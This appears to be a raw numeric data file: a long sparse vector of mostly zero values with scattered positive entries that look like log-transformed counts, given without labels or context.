0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.709530201312334, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.4849066497880004, 2.8398715690385097, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 5.4680601411351315, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 4.160336650881089, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 4.406719247264253, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 2.0794415416798357, 0.0, 0.0, 0.0, 0, 4.477336814478207, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.0986122886681098, 0, 0.0, 0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.927253685157205, 0.0, 3.58351893845611, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.8398715690385097, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.3322045101752034, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0, 1.6094379124341003, 0, 0.0, 0, 0.0, 9.252583848076162, 0, 3.1354942159291497, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 3.9512437185814275, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.70805020110221, 0, 0.0, 2.8398715690385097, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.462743943876961, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 1.7412592803704001, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 7.069162183664976, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 3.8501476017100584, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.0794415416798357, 1.6094379124341003, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 5.0689042022202315, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.3978952727983707, 0.0, 0.0, 0.0, 10.92572086966456, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 4.2626798770413155, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 13.17304868542365, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.871201010907891, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 1.6094379124341003, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.736198448394496, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 2.1972245773362196, 4.795790545596741, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 9.545153519762186, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.6931471805599453, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 2.0794415416798357, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.4849066497880004, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 1.0986122886681098, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.4825185607408002, 1.791759469228055, 0.0, 3.044522437723423, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.791759469228055, 0.0, 0, 0.0, 0.0, 0, 1.9459101490553132, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 2.833213344056216, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 1.6094379124341003, 0.0, 0.0, 2.0794415416798357, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 3.8918202981106265, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 5.16396083649347, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 5.567740402508132, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 